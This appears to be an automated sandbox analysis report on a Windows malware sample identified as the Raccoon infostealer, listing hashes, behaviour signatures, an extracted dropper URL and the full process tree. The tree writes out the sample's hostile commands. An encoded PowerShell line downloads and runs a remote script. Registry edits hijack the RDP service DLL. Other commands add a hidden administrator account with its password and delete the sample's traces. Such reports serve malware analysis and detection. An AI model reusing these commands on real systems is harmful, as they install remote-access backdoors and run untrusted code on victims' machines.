Analysis

  • max time kernel
    69s
  • max time network
    112s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    04-07-2021 01:06

General

  • Target

    Start.bin.exe

  • Size

    472KB

  • MD5

    14a480e8136dcbfc14e672544b33be76

  • SHA1

    fba00115c76fd3b09fd78d1b49c45d6429ca61f1

  • SHA256

    aef92dab31f523e018f6f40e12e0c573dce91f70f5bfed134565bdb764ce8459

  • SHA512

    b5091cfe3b3881ca2a7de88aa0ba381cc07387c3cc5d623d1ac491723da15f66b922e23d2a4c379a07114ff1480e2773e9356abca137cafa8ed5cff5ff2113a4

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blocklisted process makes network request 9 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 7 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 4 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 18 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Start.bin.exe
    "C:\Users\Admin\AppData\Local\Temp\Start.bin.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:632
    • C:\Users\Admin\AppData\Local\Temp\u8fLEi2rfe.exe
      "C:\Users\Admin\AppData\Local\Temp\u8fLEi2rfe.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        3⤵
        • Drops file in Windows directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3956
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
          "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\cps03h2g\cps03h2g.cmdline"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2284
          • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
            C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC50B.tmp" "c:\Users\Admin\AppData\Local\Temp\cps03h2g\CSCC568ED71F7424C6C9AB0ED1679705810.TMP"
            5⤵
              PID:3240
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:500
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3428
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
            4⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3548
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
            4⤵
              PID:1424
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
              4⤵
              • Modifies registry key
              PID:632
            • C:\Windows\system32\reg.exe
              "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
              4⤵
                PID:200
              • C:\Windows\system32\net.exe
                "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                • Suspicious use of WriteProcessMemory
                PID:884
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                  5⤵
                    PID:3048
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2752
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1004
                    • C:\Windows\system32\net.exe
                      net start rdpdr
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2588
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start rdpdr
                        7⤵
                          PID:2680
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:4052
                    • C:\Windows\system32\cmd.exe
                      cmd /c net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:2148
                      • C:\Windows\system32\net.exe
                        net start TermService
                        6⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2204
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 start TermService
                          7⤵
                            PID:2076
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                      4⤵
                        PID:3724
                      • C:\Windows\system32\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                        4⤵
                          PID:2156
                    • C:\Windows\SysWOW64\cmd.exe
                      cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\Start.bin.exe"
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:688
                      • C:\Windows\SysWOW64\timeout.exe
                        timeout /T 10 /NOBREAK
                        3⤵
                        • Delays execution with timeout.exe
                        PID:3548
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user WgaUtilAcc 000000 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3428
                    • C:\Windows\system32\net.exe
                      net.exe user WgaUtilAcc 000000 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:860
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user WgaUtilAcc 000000 /del
                        3⤵
                          PID:648
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user WgaUtilAcc J37PaBqq /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:3860
                      • C:\Windows\system32\net.exe
                        net.exe user WgaUtilAcc J37PaBqq /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3600
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user WgaUtilAcc J37PaBqq /add
                          3⤵
                            PID:2596
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:3164
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:668
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD
                            3⤵
                              PID:3084
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3680
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2784
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" GFBFPSXA$ /ADD
                              3⤵
                                PID:3724
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3428
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD
                              2⤵
                                PID:2244
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD
                                  3⤵
                                    PID:2596
                              • C:\Windows\System32\cmd.exe
                                cmd /C net.exe user WgaUtilAcc J37PaBqq
                                1⤵
                                  PID:2044
                                  • C:\Windows\system32\net.exe
                                    net.exe user WgaUtilAcc J37PaBqq
                                    2⤵
                                      PID:2692
                                      • C:\Windows\system32\net1.exe
                                        C:\Windows\system32\net1 user WgaUtilAcc J37PaBqq
                                        3⤵
                                          PID:688
                                    • C:\Windows\System32\cmd.exe
                                      cmd.exe /C wmic path win32_VideoController get name
                                      1⤵
                                        PID:3152
                                        • C:\Windows\System32\Wbem\WMIC.exe
                                          wmic path win32_VideoController get name
                                          2⤵
                                          • Modifies data under HKEY_USERS
                                          PID:3724
                                      • C:\Windows\System32\cmd.exe
                                        cmd.exe /C wmic CPU get NAME
                                        1⤵
                                          PID:2604
                                          • C:\Windows\System32\Wbem\WMIC.exe
                                            wmic CPU get NAME
                                            2⤵
                                              PID:648
                                          • C:\Windows\System32\cmd.exe
                                            cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                            1⤵
                                              PID:3188
                                              • C:\Windows\system32\cmd.exe
                                                cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                2⤵
                                                  PID:792
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                                    3⤵
                                                    • Blocklisted process makes network request
                                                    • Drops file in Program Files directory
                                                    • Drops file in Windows directory
                                                    • Modifies data under HKEY_USERS
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    PID:1820

                                              Network

                                              MITRE ATT&CK Enterprise v6

                                              Replay Monitor

                                              Loading Replay Monitor...

                                              Downloads

                                              • memory/500-182-0x000001B9ED6B3000-0x000001B9ED6B5000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/500-213-0x000001B9ED6B8000-0x000001B9ED6BA000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/500-201-0x000001B9ED6B6000-0x000001B9ED6B8000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/500-181-0x000001B9ED6B0000-0x000001B9ED6B2000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/632-114-0x0000000000760000-0x00000000008AA000-memory.dmp

                                                Filesize

                                                1.3MB

                                              • memory/632-115-0x0000000000400000-0x0000000000620000-memory.dmp

                                                Filesize

                                                2.1MB

                                              • memory/1160-130-0x000001EBEFB55000-0x000001EBEFB56000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/1160-131-0x000001EBEFB56000-0x000001EBEFB57000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/1160-125-0x000001EBF06A0000-0x000001EBF094A000-memory.dmp

                                                Filesize

                                                2.7MB

                                              • memory/1160-128-0x000001EBEFB50000-0x000001EBEFB52000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1160-129-0x000001EBEFB53000-0x000001EBEFB55000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1820-256-0x00000160B1F68000-0x00000160B1F69000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/1820-255-0x00000160B1F66000-0x00000160B1F68000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1820-254-0x00000160B1F63000-0x00000160B1F65000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/1820-253-0x00000160B1F60000-0x00000160B1F62000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3428-214-0x000001B0FB350000-0x000001B0FB352000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3428-217-0x000001B0FB356000-0x000001B0FB358000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3428-215-0x000001B0FB353000-0x000001B0FB355000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3548-218-0x0000022EF19A0000-0x0000022EF19A2000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3548-219-0x0000022EF19A3000-0x0000022EF19A5000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3548-221-0x0000022EF19A8000-0x0000022EF19AA000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3548-220-0x0000022EF19A6000-0x0000022EF19A8000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3956-164-0x000001FCEB040000-0x000001FCEB041000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/3956-163-0x000001FCEACB0000-0x000001FCEACB1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/3956-157-0x000001FCE9A60000-0x000001FCE9A61000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/3956-149-0x000001FCE9256000-0x000001FCE9258000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3956-142-0x000001FCE9AD0000-0x000001FCE9AD1000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/3956-141-0x000001FCE9253000-0x000001FCE9255000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3956-140-0x000001FCE9250000-0x000001FCE9252000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3956-137-0x000001FCE9920000-0x000001FCE9921000-memory.dmp

                                                Filesize

                                                4KB

                                              • memory/3956-165-0x000001FCE9258000-0x000001FCE9259000-memory.dmp

                                                Filesize

                                                4KB